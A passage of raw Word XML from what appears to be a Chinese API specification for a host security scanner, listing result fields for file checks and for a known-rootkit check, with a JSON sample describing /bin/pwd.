            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E97CB12" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件大小</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="31498919" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="466EDE40" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>change_time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26511DC2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10EF7385" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D2F7933" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件属性的修改时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2916FFCA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D1D4950" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17927BF9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69AAC750" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57AD2951" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1F96C0FD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="725FA96B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AF3612F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45E436E5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(100)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F1ABB78" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7289B7F5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75766DF1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_permission</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B64B40E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="415C6084" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FEF8338" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件访问权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="28ACF664" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2863302F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="003C506C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24E5EE71" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23F9292A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件所属用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6DE7EDC1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E7534C5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41762642" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CA690C2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D0C5A10" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件所属用户组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7598EC10" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A511D6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "match_rules":{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">         "175":".*"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "file_sha256":"e11183e4d33672e548804659841f3b013f9f366312af9fb85afbba458608e41c",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "file_sha1":"0e25541ac9b5096df961e3532a84bddde2bd75c5",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "file_name":"/bin/pwd",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "access_time":1550569446,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "file_md5":"1f30f796aa5218cdca9645990020752c",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "file_permission":"rwxr-xr-x",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "modify_time":1548210801,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "change_time":1548210801,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "file_owner":"root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "file_size":31472,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "file_group":"root"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A9E123" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="239" w:name="检查功能已知rootkit检查"/>
      <w:bookmarkEnd w:id="238"/>
      <w:r>
        <w:t>检查功能：已知rootkit检查</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612EBD80"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1661"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="6099"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="26D60C8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928C3C5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BEB4877" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C47C649" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="488EBC2E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="42C27B26" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CAA5187" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>rootkit_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D06AFBD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7490BDB3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FCA6646" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>rootkit名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="62E069CD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39FB340D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>check_type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7508A8FE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6848030B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DA9B70E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>检查类型,用来区分是文件、文件夹、内核符号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0DF96590" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5647D5E2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>extra_info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CE514F9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B624E14" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="255A22E5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>仅当检查内核符号时可能有值,表示内核符号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="36B838B5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33BA0BE5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>access_time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03672E15" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="285F7F99" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72AECB40" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件的最近访问时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="63051B46" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5464454E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>modify_time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25C39B1A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C21FF26" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F463251" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件内容的修改时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="06456DEE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55F44211" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="169766C3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="494DFF7C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="504F1E2C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>如果是文件，那么是整个文件内容计算MD5；如果是文件夹，是空字符串</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4A4E50BF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3097052D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CAE4E4A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35FE368A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(100)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="747F14CF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6E88E181" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="397C797E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="774DA2E6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="786F405F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F056F3A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件大小</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4C316D5E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="143FFF1D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>change_time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="762AA8B7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D9762A0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13AF6E91" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件属性的修改时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6F46769A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F3D8DEF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="177ADB0D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F32314D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="239A3DED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件所属用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1B10917B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D40D30D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AED8326" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44CD1229" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A3E8212" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件所属用户组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0A7C54F0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65A9E436" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_permission</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41A4E53A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
